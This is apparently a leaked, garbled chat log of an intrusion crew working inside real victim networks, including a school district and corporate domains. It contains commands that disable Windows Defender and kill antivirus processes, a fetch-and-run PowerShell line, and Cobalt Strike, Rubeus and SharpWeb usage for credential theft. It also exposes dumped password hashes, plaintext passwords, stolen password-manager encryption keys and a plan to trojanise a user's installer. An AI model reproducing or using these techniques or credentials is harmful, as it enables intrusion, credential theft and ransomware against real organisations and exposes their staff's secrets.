reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg add "HKLM_SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg add "HKLM/SSOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg add "HKLM/SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
``Symantec
```
net stop srservice
``Avast
```
@Echo off
taskkill /f /im ashMaiSv.exe
taskkill /f /im ashServ.exe
taskkill /f /im aswUpdSv.exe
taskkill /f /im ashDisp.exe
Exit /b
``[ ](https://mediaeveryone.com/group/sisd-net?msg=wfYTtjYHM5woBJWMs) I've only seen it on one viewIf there is no central system let someone look for ways to turn off all the avers manuallywhat's this thing that bothers me...> 200 servers and > 4000 users then it turns out 3 people from here without tasks yet? as usual all of them. then we wait. will only steal servers or users too? dept will not make it we have contact with dept, maybe order yourself?we have to wait for tl2build now there is no tl2build, let's finish with it then? ok, where as. there solyanka assembled and the rest are empty? mostly on the file and skula bitdefender stands, if i'm not mistaken plus/minus when the servos sorted from each processlists took a lot of it more than 50% of all servers?[ ](https://mediaeveryone.com/group/sisd-net?msg=SSZ24JGTuwpkRkWib) by process many have nothing but vindef at all how did you determine? differently the server segment is covered by what? maybe they don't have a centralized avera after all? We found avira, bitdefender, CORTEX XDR™ and I think something else...both from polzac and from the system from the context of the polzac process? sharpweb found nothing, as well as sibeltda don't forget to change the process if it kicks out don't go there1 session 1 sharpweb, not more? and here is the description
Usage:
    .\SharpWeb.exe arg0 [arg1 arg2 ...]

Arguments:
    all - Retrieve all Chrome, FireFox and IE/Edge credentials.
    full - The same as 'all'.
    chrome - Fetch saved Chrome logins.
    firefox - Fetch saved FireFox logins.
    edge - Fetch saved Internet Explorer/Microsoft Edge logins.
``see edge folder in the projecthttp://github.com/djhohnstein/SharWeb does he use edge? ff? which is probably quieter than chrome) and kicked out - just sessions fell off via lazagne from the toolchain and how did you try to get them back?kicked out how? I found where the DA sits, but he kicked me out quickly, while I was trying to steal the credentials from the browser look for web access it must still be on amazon, on the data2 and dc domain sisd.k12 no admin avera - I'm there by rdp went to ...ok just describe the situation normally and not bits and pieces sketch in the general conf conf conf this case of migration between domains and was Lanu yes, but I learned that after dksinka and this polzak was LA? so maybe there was not an admin with such creds this car in the domain `ADM `, I was lucky that the local admin with the same creds No, this is on another issue[ ] (https://mediaeveryonecom/group/sisd-net?msg=BxPbEPBQ7Q9m3tSoZ) this admin process was where you had the session? `sisd.k12\ExchAdmin f461d17330cadafe07025e2256eda52a` - under these creds you can look directories on DATA2 but session is not raised in the ADM domain admin process on which question yes?)ADMdathe domain? that domain? admin what? let me start at the beginning, I was given a session under the system, I logged into the admin process and already under it looked at directories[ ](https://mediaeveryone.com/group/sisd-net?msg=cNQpCcL7oMoYo9i6zC) how did you check the diaries? you had to have access to that domain to give you a listing diaries`Sam07bo`f461d17330cadafe07025e2256eda52a found on cmd5 @tl1 make clickpls then jumped diary checked directories of cars that domainanet, how did you get in?and the session went up after running vmikomdl scripted in dlkak did you do?
[DC] 'sisd.k12' will be the domain
[DC] 'Geordi.sisd.k12' will be the DC server
[DC] Exporting domain 'sisd.k12
[DC] ms-DS-ReplicationEpoch is: 1
502 krbtgt 473e0e4f4e2c2f68efe96bfe23e3b186 514
1001 SUPPORT_388945a0 5e62b6beff8ee61447406436dd7c8fa1 66050
1121 IWAM_PICARD d047d4e970e1f608542175fd69bf63f0 66080
1606 CMP-TCH-51-68$ 40d7e6ce37245fa0fb82021e392e32d2 4096
1111 RIKER$ 4dbc3efa9d3b7447e446d2a0614649e6 4096
1120 IUSR_PICARD 463af0a30e5de0fae941442e7aaf0c 66080
1617 DATA$ 1cf75f296f3bc0878b17689fa14e519f 4096
5610 ADFS-DIRSYNC2$ c0f22374c0e3623fd2df53d44ff7f5f3 4096
1114 DCHPAdmin f461d17330cadafe07025e2256eda52a 512
1605 ExchAdmin f461d17330cadafe07025e2252256eda52a 66048
5608 backupexec 410091ed6c810d68980fa84c69a19886 66048
5606 VDI-DDC1$ ee0400eec033d8ab2ea9950a5ab7ed18 4096
503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514
1126 SISD-DHCP-01$ a92dfdae9dd565b420cd8f3b2dd94a05 4096
7606 AZUREADSSOACC$ 3fe49e41eba481a7dd54ae104781328d 69632
7605 DESKTOP-7EDHUBD$ 47554a274b9d9d99b57e6be985332fde 4096
7607 NTP$ c260b6cb1403ef9c878a7a1bfb3ca1ea 4096
5612 DATA2$ bf7ecf55672760909a29e3a8e1aa368 4096
500 Administrator 410091ed6c810d68980fa84c69a19886 66048
7104 ADFS-DIRSYNC$ ed73098ff2fddf912c76e93a79c3d6d5 4096
7105 GEORDI$ e8cc320ade6b5ce43ddc553dd50e00db 532480
1106 ADM$ 5a98229bc5afbb1d30651d119bd9d9f9 2080
8604 LOR$ 07d2c1dcbb443c103fecc651475c9cb2 532480
7604 PICARD$ 84a342f7e77ce8d1dc718316105011fa 532480
5108 DATA3$ 3fb5d4e111cf430273321d4d19378a49 4096
``USSC1500slip in 400 sec and leavesessions from rundll processes move to the systemmemo for tomorrowLocal admins found, hashes collected, go to the domainuntil then draw a line last message and for tomorrow check domain availability againCheck domain availability againTomorrow) you bypassed yuac module which disassembled) I about local admin[ ](https://mediaeveryone.com/group/usscgroup?msg=F4MBctxLgBSNGajBK) have not paid attention?
 Username : stwitchell
	 * Domain : USSCGROUP.LOCAL
	 * Password : 3stwitchell3#
``Local admin list still + password from the current one``
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
%GuestUssc!!:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nimda99:1001:aad3b435b51404eeaad3b435b51404ee:aae35fd0e9edf9eee30d512cdcdbc773:::
PCPitstopSVC:1002:aad3b435b51404eeaad3b435b51404ee:c242ba17550668998afeb36cbb1992f0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a37c6648cb801450e1316a6b58d94aa8:::
``ask your colleagues how they got around yuac, you also polozak local admin today to a maximum of 12 hours, if you do your volume, tomorrow you can safely parse records)did not sign what the docs?)but I do not think that you for so many days of study, all written in one doc and did not delimit it in any way@user1 will have time, be sure)[ ](https://mediaeveryone.com/group/usscgroup?msg=Kqt3htCFgYRoGeoh8) do not remember, most likely yes `User USSC1500\Nimda99 S-1-5-21-2785713682-3075257879-4011609139-1001`
and 1001 on the end means that the admin ?we had so many modules, we ran them for days in the lab and made notes, or they have run out?) not enough information? collect more and what is it? how to be further? you have ad info? don'tttalk on gathered info or dilute less loadeda meanwhile, if the session began to take commands again, you can send thema)[ ](https://mediaeveryone.com/group/usscgroup?msg=TQe8r8DwKcwkHvxTr) as soon as the session died out (passed the slip, then returned to normal) and no output came, you can continue to write commands)``[]
[!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/

 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253

 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk


``Why don't you raise the context?)``caption is not raised? dk? specifically adfindthere is no point in hiding, because the running software is legitimatejust `shell adfind.bat``why do you use powerpik to work with exe launching?tl2user2+user7 I will add and you can do spidran)will do tomorrow, just a list of users here to work with this session before tomorrow+I sent @сlose to all green and delete files if there were do not forget to close sessionsTesting this script pack https://github.com/S3cur3Th1sSh1t/Creds/tree/master/PowershellScriptsтогда change the script `The term 'CheckIfWindowsIsCore' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
C:Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 SetkRegSmbv3Compression -value 1
The term 'SetkRegSmbv3Compression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0064

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker.ps1 SetkRegSmbv3Compression -value 1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0044
``It doesn't work taki tSetkRegSmbv3Compression -value 1```
SetkRegSmbv3Compression -value 0

``that kind of thing''.
Do {
    Get-Menu
    $input = Read-Host "Please make a selection"
    switch ($input) {
        '1' {
            Write-Host 'You chose option #1'
            CheckRegSmbv3Compression
        } '2' {
            Write-Host 'You chose option #2'
            SetkRegSmbv3Compression -value 1
        } '3' {
            Write-Host 'You chose option #3'
            SetkRegSmbv3Compression -value 0
        } 'Q' {
            return
        }
    }
    pause
}
``````
C:\Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker.ps1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0080

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796
The term 'CVE-2020-0796' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0045

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker
The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0057

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1'));

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker
The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0048

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker.ps1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0044

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 .\CVE-2020-0796-Smbv3-checker.ps1
The term '.\CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0058

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 ./CVE-2020-0796-Smbv3-checker.ps1
The term './CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0030
``Isn't the session dead after importing?
 iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1'));
`` How do I apply it? So CVE-2020-0796-Smbv3-checker.ps1 and so CVE-2020-0796-Smbv3-checker doesn't work.Help another command while sessions[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=WnzRANjv9WyDTJovG) Lёh, here's up to 150ZT-0314jesh-6396 ``
File exceeds allowed size of 100 MB. [error-file-too-large]
``would it be better to download it here as an archive or as a file? ad_users downloaded yes, endpoint((*with a password, if there is an endpoint, then only disable it in the password@tl1 and kasper can shut it up for a while?i hope you'll be able to download it in a few minutes........then i looked at the size.....first i told you to download it......i'm smart......i hope you'll be able to download it.......how much do you think it'll weigh?
[X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED

``````
[X] No users found to Kerberoast!

``Both of the hash types try to take the rube off``.
beacon> shell net group "enterprise admins" /dom
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator pmpdemo rmp
The command completed successfully.

``````
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator adssp assetprober
desktopcentral gjprabu-0985 kamal-0150
nocfw sysadmin sysaudit
vijay-3486 zohoits
The command completed successfully.

``The file is gone again.
[*] Action: AS-REP roasting

[*] Target Domain : csez.zohocorpin.com

[*] Searching path 'LDAP://est-adc2.csez.zohocorpin.com/DC=csez,DC=zohocorpin,DC=com' for AS-REP roastable users
[*] SamAccountName : gunas-0326
[*] DistinguishedName : CN=Gunaseelan Parthiban,OU=Windows Server Management,OU=ManageEngine,OU=Users,OU=All Users and Computers,DC=csez,DC=zohocorpin,DC=com
[*] Using domain controller: est-adc2.csez.zohocorpin.com (192.168.100.93)
[*] Building AS-REQ (w/o preauth) for: 'csez.zohocorpin.com\gunas-0326'

[X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED

[*] Roasted hashes written to : C:\Users\raja-9298\EULA_as.txt

``Let's put it this way.
execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
``Not even a blank and no output file, actually``
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Users\raja-9298\EULA_ha.txt


[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[X] No users found for Kerberoast!
[*] Roasted hashes written to : C:\Users\raja-9298\EULA_ha.txt
``Did you do it?'' in #general and ``AdventNetLicense.xml 3
```
ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering

<LicenseKey>.
5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
````AdventNetLicense.xml 2 ``
```
ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydPP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering

<LicenseKey>.
5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
````AdventNetLicense.xml 1`
```
ACNTRL="NO" CompanyName="Mizuho Information Research Institute Inc" EmailID="satoru.mochida@mizuho-ir.co.jp" Key="nJbGSnDTGRbp9NS3dP3XG7cydJJ97SlddJfyGnx3lcQ7ancPJdc7yVJzKJ9VSaSJJ99ancPJdc7y1bJKPDGyTdlAaDQaSnndPX9NTTnPfp97KDndV911Py3Aa97dD7ndV917K9u9P9yyPQbDufSJuyzTfzlp" LicenseType="Registered" Name="ADJ20S6024EI1"

<LicenseKey>.
10Ui0U1W0WkR8H2goMATWU60U0W0Wv4XdNj84XRvNvDbTEVTEWUenjdjenjmjYIHRjYjCj9avsNvY8LUHJ4YX4NjPkRXGNjYvoLLKNkR4NKjYGvRv4s8ivrvHk4RvsKvsNvY8LHJIjYIR8UjCK98maXG8CYjmIKRj4Xs4YX4NjPkRXm8RpiV61100000VdjvsNvY8lETE0U111U5001djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz5N8mGXvKR4pMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
</LicenseKey>.
``Another file ``pmp_key.key
```
#This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro.
#The default location of this file is <PMP_HOME>conf and it is not secure to leave this file here, unless
#the server is sufficiently hardened to protect any illegal access of this file.
#It is highly recommended to move this file out of its default location and for instructions to securely store this file refer.
#Thu Jul 23 12:13:08 IST 2020
ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc\=
```
```ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc=``[*] Tasked beacon to run .NET program: SharpRoast.exe all
[+] host called home, sent: 120881 bytes
[+] received output:
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
Hash : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com*$AD257AAE06
                         D3290ED5802E98A5680072$074EFBF3ED77AAD8403FFD9B1DC91C3A4548ABC68CC6D82693883D1F2
                         674826398708B33E7474B1A7A88CDBB147CEE0E9E55DF333D38AF6E6BF1FFCC9B9848E96372B2684
                         F5D616B986D16C673820FEF3EDFE905FC2EC48B0BE46A4AC3229930167A88F92124F509C9FE99EE6
                         074CA3F7443F08AB4F49CE97F02D83CE21E7958541219280C06EC0259FFEE7DD9BDA9FCC28C69984
                         884576F8A098B0507E45E2EA3A6FBACB1CEFF7F435484F83B050C3D9B2DC68E5983963629CE1C04D
                         72CF0EFA00AA01FC0BDDADDDFDCC3A9F0532EFEC4D88408B597AC74F2668E979E22348E0C6F1890B
                         1AE0F8D2724492417699C3BD444312212A5FF50A246D4D5770AD50860E3B52CCD2BCE7A6660DA9B6
                         FFE81B456129A617FBF351F815FE23624699E69EFB4F4788531E5677B125136BCF1AD9DCC3C8C139
                         B36C05C5A493BE7237E14D4F194307F1B7D53F2CA333364CAC135D79688E4A0EBB342BC3DA9C3D12
                         7255740A8843B17CAB787077BDDFEF59A916E56392DB087BE09523933671E3832D532D329B2BFCF4
                         ECDB2A51274DD50970EC9796AB56788FA7CE668093FC5D68EE6AB796574985BD1CFDAF6EE88416E9
                         5F33A3F7C29E4ED1C8804DEA928E2050A2070044A83AF610D673EAF783D3C258BF4F00F3A67EE236
                         4A19579A448CEA1806C716B3603C0C6DA9B72BFAB8390CD7971CD4FBE8F022E64828069C478D56CA
                         DE866536D19FFB5EF529F408CBC7D9F6B161164632CEE450220CA94B1CD692D9A6C4EACA431AAAD9
                         024F429182D8D0B4BAFE8C9B27BE54444DBFB4D7FE2F3949064F9CBC3034F59EF0AD9C01D0238F53
                         6614F21303664809AECFE53914D4E16B9222BD0550F8587F39AFA385E87EA7B430994234E883FB46
                         150E6BFF285F69F035C0410C11E4610C187EA4A05E57E3FEE8C1CB133DAE9549E9B9E757E0BB9A1E
                         5016A8893C2EDECD58D61216879A358AFAE0799986B31CA903B655E244C19ADBF68DB8A8417F5989
                         976B4B19CA800E5BF1E8B7227A559E146A7B63360E430B31823801CAA81E625481858F598BB10FF9
                         E31F97473E408B67297A919C3C4264ABA52F8242F4F8E07D4946AE7B146A69950C54923A895D333E
                         027820953AC4FBED2201253B15B79AC993628CADDA92AA14232A6F0974A19983099890F2119E7D64
                         C5AA329A5CE288E7CB3F66AB76619330E27380E145E089DD71799B7B511FBF9A843F8DF6973EBBAC
                         5779C06426790A5C7998E94E44341A18CE6D5C4287C93C82286DF1AF180DF16543567A3E9D8A8679
                         E5B16BCCD1136074AFD36F9FBA1D8913C50C00718F9B48730670713A50D4590B4FBB8932483A2AE6
                         B80BA376DAECB3B8C0C896E6F402E95E6EAE1B5D1B125559904D8B9B295E1F9DEE020493AA73E62C
                         22953B86DDC1F71447449C9924192EFA419025D07EA8D8C876FBFC0E697BED24440CEBE3D943AF8B
                         F3A5419F139B893CE4A8B4E81EB63BA13DB0B1FB22020BACD3B77E4165E0B0AC2F1109606F976F3F
                         C5A62E1704F09522C1683D69278B4E4978E1717EEC5E10F72A17A00B77BE6A2493B3F889AB8EFAF6
                         B0F5D73B0999D72F5FACBEED69AF9CCF0F4953104987E7A6ABB8004A640F8


[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt where is the info below? noThis is full[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=yatwv5agaaG3kamLj) full hash here please`c.pwd
```
encryption: CRYPT_32
isAutoGenerated: true
value: !binary AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAQJ/RBxj+LUaKlYDoaxymTQAAAAAWAAAATQBhAHMAdABlAHIAIABLAGUAeQAAAANmAADAAAAAEAAAAGVElARuRUadgjS3W1uSvCQAAAAABIAAAKAAAAAQAAAAUy6lhSSz1zlSx9DSYFh9yMgCAABqQA0+VQbKZkfm57FEHb86h1+nYjPkHiN7pUKp/8UYSgHvAOu41zWNCfbJ1ek+agdInGj95BdYXt14ETUawhtMuRlEq6ovhefsudhtI75/ZA8xUuUYsffwt4kAJOJAACyNFyVDMywtMc6xLFUlrfGvhrZVqPtWgeGyolUxukQbbF/Va4wYE3p+fsGHwNGoQdjMDFi/w1NMxZRVdF3tPtnvUHTkcJep8iFoBN8cLC2li0iDkg7yv6reWc4U63M9ZD3nz5Q6WlrFHOiII1m4LtThNFTGGvA+afWiGAYOEvtIjsBOSYJn670716/3Yodo8jLjftWW3+FuakUdHvjZylfKqBSIkxgRWqcAiHhzjVjpeYvrMpnb+LiioMa6axKrS1pE+/6fQrWpJzyVb/eLIXwu9FBTjCbW1kiWnpVACqdWUBCqL9hdfUL2X72gJsaWtgag/vKLSWjrS8VatdaXNBDqaFeFibYmbMwqHT1u3uxEL9fg+SjFA5SHjiyo3MMAxENByEwSoXw+sw/6YU9vM1Uwm9AN8e/Mc4XGe7fhc0A+18MolWgEbI1dCDTLutObgls7L9GEqo19XMfCMBWfcKVBjU51zpG6PolDbIvNsNF0lFKXbN0oey1wFhDnmk3mCE6qJ+AZ0qYFXwZitBFsEmPNul4+BoDKfrvuofwoLYfi+KxHTgo4XzXFFW9LNdo+gt62Ngsyl9WI9gqvxy+CavMn9M8my9r6nliaWVEtRxOS4pfabPc80vzncdVPYAxVeMGkw2OJOaeCw41VWBKl7TSIE5JQAogB1Sdl1+Z+GoTif6gkXf5e6ZBvnJEMoBhADcTWDm/Genp/FeuV
``[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=7QWLSvMpoZJ3ApgQf) UserName=admin
OrgAgentKey=7ibHlt21yiwithin this there is an av that is fighting against such methodspon fact need to pull the file, glue it to the load and load it back Sure, but it is not very simple and quite strange@tl1 can we somehow take from his desktop file msi or exe add to it our load and force him to run? It's just that he has installers on his desktop and the same anydesk, which he probably runs without installing...`pmp_key.key
```
#This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro.
#The default location of this file is <PMP_HOME>conf and it is not secure to leave this file here, unless
#the server is sufficiently hardened to protect any illegal access of this file.
#It is highly recommended to move this file out of its default location and for instructions to securely store this file refer.
#OLDENCRYPTIONKEY=9COBmS4sjljyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA=
#Tue Dec 10 20:22:53 IST 2019
ENCRYPTIONKEY=5qRvsVKpPFdB6RnZQI89p6PUYWT6Oki1gHGgZWgRID0=
```
`OLDENCRYPTIONKEY=9COBmS4sjljjyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA=`
``ENCRYPTIONKEY=5qRvsVKpFdB6RnZI89p6PUYWT6Oki1gHGgZWgRID0\=``ShareFinder
```
\trm-compliance.csez.zohocorpin.com\DC_Deployment -
\trm-compliance.csez.zohocorpin.com\F -
\trm-compliance.csez.zohocorpin.com\Venu-5860 -

\DC-SOFTWARE.csez.zohocorpin.com\iso -
\DC-SOFTWARE.csez.zohocorpin.com\print$ - Printer Drivers
\\DC-SOFTWARE.csez.zohocorpin.com\u16 -
\DC-SOFTWARE.csez.zohocorpin.com\Users -

\print-server-bkp.csez.zohocorpin.com\Coolpay-Server$ -
\print-server-bkp.csez.zohocorpin.com\D -
\print-server-bkp.csez.zohocorpin.com\print$ - Printer Drivers
\print-server-bkp.csez.zohocorpin.com\Users -

\est-desktopcentral.csez.zohocorpin.com\DC Backups -
\est-desktopcentral.csez.zohocorpin.com\DC_share -
\est-desktopcentral.csez.zohocorpin.com\logs -
\est-desktopcentral.csez.zohocorpin.com\pg_log -
\est-desktopcentral.csez.zohocorpin.com\ScheduledDBBackup -
\est-desktopcentral.csez.zohocorpin.com\webapps -

\EST-ADC2.csez.zohocorpin.com/NETLOGON - Logon server share
\EST-ADC2.csez.zohocorpin.com\SYSVOL - Logon server share

```
Also looking forcsez.zohocorpin.comip DC
`192.168.100.61````
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
Hash : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com*$AD257AAE06
                         D3290ED5802E98A5680072$074EFBF3ED77AAD8403FFD9B1DC91C3A4548ABC68CC6D82693883D1F2
                         674826398708B33E7474B1A7A88CDBB147CEE0E9E55DF333D38AF6E6BF1FFCC9B9848E96372B2684
                         F5D616B986D16C673820FEF3EDFE905FC2EC48B0BE46A4AC3229930167A88F92124F509C9FE99EE6
                         074CA3F7443F08AB4F49CE97F02D83CE21E7958541219280C06EC0259FFEE7DD9BDA9FCC28C69984
                         884576F8A098B0507E45E2EA3A6FBACB1CEFF7F435484F83B050C3D9B2DC68E5983963629CE1C04D
                         72CF0EFA00AA01FC0BDDADDDFDCC3A9F0532EFEC4D88408B597AC74F2668E979E22348E0C6F1890B
